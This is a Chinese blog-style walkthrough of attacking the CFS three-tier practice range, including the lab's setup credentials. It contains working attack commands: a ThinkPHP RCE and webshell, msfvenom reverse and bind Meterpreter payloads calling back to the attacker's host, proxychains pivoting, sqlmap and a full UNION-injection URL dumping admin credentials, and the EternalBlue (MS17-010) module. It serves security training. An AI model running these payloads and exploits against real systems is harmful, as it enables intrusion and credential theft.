靶场环境
链接:CFS三层靶机环境_免费高速下载|百度网盘-分享无限制 (baidu.com)
提取码:qaza
该靶机的渗透流程如下
通过攻击机kali192.168.1.xx攻击target1 的192.168.76.148,target2和target3不能连接外网,只能再内网进行通信。所以得先渗透target1,然后通过他的22网卡去攻击target2,然后通过target2做跳板来攻击target3
环境配置
一、配置网卡
在VM编辑处找到虚拟网络编辑器
点击更改设置
VMnet1改成下面这个样子
同理VMnet2、VMnet3也改
改完三张网卡之后导入三台虚拟机,Target1设置为VMnet1、VMnet2网卡
Target2设置为VMnet1、VMnet2、VMnet3网卡
Target3设置为VMnet3网卡
攻击机kali2022设置为VMnet1网卡,与Target1互通,Target2也有VMnet1网卡是为了方便在kali修改Target2的配置,配置完会删掉
二、配置宝塔
分别打开三台靶机,输入账号密码进入
root
teamssix.com
查看三台靶机的ip地址,确保Target1一个在192.168.1.0网段、另一个在192.168.22.0网段
确保Target2在192.168.1.0、192.168.22.0、192.168.33.0网段
确保Target3在192.168.33.0网段
确保kali2022在192.168.1.0网段
确认完毕后来到jkali,通过192.168.1.0网段的IP地址打开Tagrget1的宝塔面板
账号密码
地址:http://你的IP:8888/a768f109/
账号:eaj3yhsl
密码:41bb8fee
打开192.168.1.128的80端口,确保kali可以访问到
Target2也同理,账号密码如下
地址:http://你的IP:8888/2cc52ec0/
账号:xdynr37d
密码:123qwe..
根据你Target2的22网段IP修改
环境配置到这就完成了,最后删掉Target2的VM1网卡即可
Target1
搭完环境直接开打,使用nmap进行信息收集
nmap -sS -v -A 192.168.1.128
扫到80端口开放
访问一下80端口,很明显的thinkphp5框架
直接掏出工具扫一波,存在漏洞
命令执行逐个尝试exp,发现第二个exp可以成功
那么接下的思路很明确了,存在RCE --> 写shell ->蚁剑连
连上后随便翻一下目录,发现在robots.txt、flag21sA.txt存在flag
查看一下权限,www是个低权限用户
先反弹个shell,在msf生成Linux的马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.129 LPORT=4444 -f elf>1.elf
生成完马先让msf监听本地的4444端口
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.129
set LPORT 4444
exploit
然后在蚁剑上传到/tmp目录下,虚拟终端执行
msf接收到会话
之前尝试了一下提权,都没成功,可能这靶机的作者觉得www的权限只够打内网了吧,不需要提权。
拿到会话后进行信息收集,获取网络接口
run get_local_subnets
存在22网段,现在我们是在1网段进行沟通,如何访问到22网段呢,msf和cs都有代理集成功能,我们使用这些功能设置.,先添加路由
run autoroute -s 192.168.22.0/24
run autoroute -p
现在的会话是session1,是建立在Target1的shell上的,建立路由后可以和22网段进行通信。那么我们想要通过session1用工具去攻击22网段,这个时候该怎么办呢?
为了解决这种情况,我们可以在本地(msf上有模块可以开代理)开一个代理,通过这个代理给其他人一个端口去连接,然后我们就可以用自己的本机(自己的电脑,不是攻击机kali)去连接kali的端口,这样就能访问192.168.22.129了
background
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 1080
exploit
在linux系统下,可以利用本地的代理接口进行访问
vim /etc/proxychains4.conf
在文件末尾修改成刚刚的配置信息
直接在kali用nmap对192.168.22.0网段进行扫描是不行的,会显示没有发现
需要加上刚刚配置好的代理文件才能进行扫描
在windows下可以装个SocksCap64,设置代理
将要使用的工具加入里面就可以了
Target2
在浏览器想访问22网段的话,也是很简单的,配置一下网络就好
对192.168.22.129进行信息收集,扫一下目录
翻看一下robots.txt,找到后台登录地址,有验证码先不尝试爆破
查看源代码找到提示,存在sql注入
直接sqlmap跑
proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword –dbs
proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword -D bagecms –tables
proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns
proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin -C username,password –dump
不知道为什么最后一步没成功,直接在浏览器手注吧
http://192.168.22.129/index.php?r=vul&keyword=1%27%20union%20select%20group_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20bage_admin%23
拿去somd5解密
登录后台,拿下flag
四处翻翻找找可以拿shell的点,发现在模板的地方可以拿shell,与主页的内容进行对比,发现是
主页是这个php
写入一句话木马
上蚁剑进行连接
继续传马在msf拿shell,不过目标是在192.168.22.0网段,主动连我们肯定是连不上的,所以这里需要正向连,msf去连它
生成正向后门
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > 3.elf
msf正向连接
background
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.129
set LPORT 3333
exploit
还是老步骤,信息收集+配置访问
获取网络接口:run get_local_subnets
添加路由地址:run autoroute -s 192.168.33.0/24
查看路由地址:run autoroute -p
Target3
尝试扫描33网段
proxychains4 nmap -Pn -sT 192.168.33.33
发现这是开放着445、3389端口的Windows系统 ,使用永恒之蓝试试
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
options
run
拿到会话后随便执行系统命令了,这里shell乱码,可以输入
chcp 65001
修改编码,就好了
shell
net user
搜索flag
cd /
dir /S *flag* /B
type C:\Windows\System32\config\flag.txt
# /B 显示文件夹或文件的名字
# /S 显示指定目录和所有子目录中的文件。
# dir /S /B *flag* 这样写也可以
最后type查看即可
总结
一、第一次打内网的靶机,花了好多时间,搭环境+打靶,msf老是断会话、socks代理有时候玄学,就是这样配置的,但是就是不行。
二、打靶搞socks代理玄学时问了下学长,让我换个工具,不要仅仅局限在msf。的确,后面得学学怎么利用其它工具来打....
参考文章
CFS三层靶机搭建及其内网渗透附靶场环境 - 安全客,安全资讯平台 (anquanke.com)
代理技术应用之三层内网漫游 - FreeBuf网络安全行业门户
版权归原作者 ZredamanJ 所有, 如有侵权,请联系我们删除。